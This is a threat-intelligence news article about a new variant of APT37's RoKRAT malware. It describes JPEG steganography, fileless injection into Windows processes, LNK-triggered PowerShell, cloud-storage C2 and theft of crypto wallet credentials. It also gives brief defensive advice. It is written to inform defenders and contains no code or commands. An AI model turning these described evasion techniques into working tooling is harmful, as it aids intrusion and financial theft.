- Malware is concealed in harmless pictures in order to be undetected.
- Secret control servers are taken over via cloud APIs.
- The threats to crypto platforms are credential theft and malware mining
APT37 group in North Korea has released a new variant of malware called RoKRAT. It uses advanced evasion tactics to stay hidden. Its stealthy approach embeds malicious code within image files. This is because it uses a technique called steganography, thus it evades detection by the traditional security tools.
Source – genians.co.kr
RoKRAT executes attacks without leaving files on the disk. It inserts malicious code into legitimate Windows programs such as mspaint.exe and notepad.exe. It avoids antivirus software by executing code in memory.
Cloud storage services of Dropbox, Yandex, and pCloud are also misused by the malware. These cloud environments are used by the attackers as command-and-control (C2) centers.
Hidden Threats Inside Innocent Images
Source – genians.co.kr
The malware is ingenious in that it encapsulates its payload in non-threatening JPEG files. These image files carry encrypted code behind the scenes.
RoKRAT’s dual-layer XOR encryption further complicates analysis. As soon as the malware is launched, it decrypts and runs this obscure code in memory.
The malicious shortcut (LNK) files are packed in ZIP archives and start the infection. These shortcuts run hidden PowerShell commands.
This action retrieves the encrypted images with the malware in accounts controlled by the attackers in the cloud. Since the code appears like any other image, it evades most of the defenses.
Cloud Storage as Secret Hubs
APT37 uses the common cloud storage APIs to remotely operate the malware. RoKRAT will communicate with such services as api.pcloud.com, cloud-api.yandex.net, and api.dropboxapi.com to transmit the data and obtain instructions. This makes its traffic blend with legitimate cloud operations.
Attackers maintain a persistent control of these cloud C2 servers using revoked access tokens and masked email accounts.
This keeps the malware resilient and stealthy. The fact that it connects to actual cloud services makes it hard to detect by the defenders.
Fileless Attack Increases Stealth
RoKRAT’s fileless nature is a major challenge. It has a low forensic footprint because it injects code into legitimate Windows processes. The attacks are based on process injection as opposed to file writing to disk.
The security teams should monitor abnormal activity in the system processes and suspicious outbound cloud traffic. Such abnormal activities can be identified with the help of Endpoint Detection and Response (EDR) tools. The best way to fight such advanced persistent threats is through early detection.
Cryptocurrency Sector Under Threat
This malware is becoming a threat to the crypto sector. RoKRAT is capable of stealing crypto wallet keys and account credentials. It also carries out cryptocurrency mining without the permission of the users.
APT37 goes after people and companies that work with cryptocurrencies using cloud environments. The malware poses a risk to drain the assets without detection since many crypto platforms use cloud infrastructure. This creates grave financial risks to exchanges, wallets and custodians.
Security experts and developers in blockchain projects are also on the radar of the attackers. Spear-phishing campaigns also install RoKRAT on their systems to extract sensitive data and cryptocurrencies.
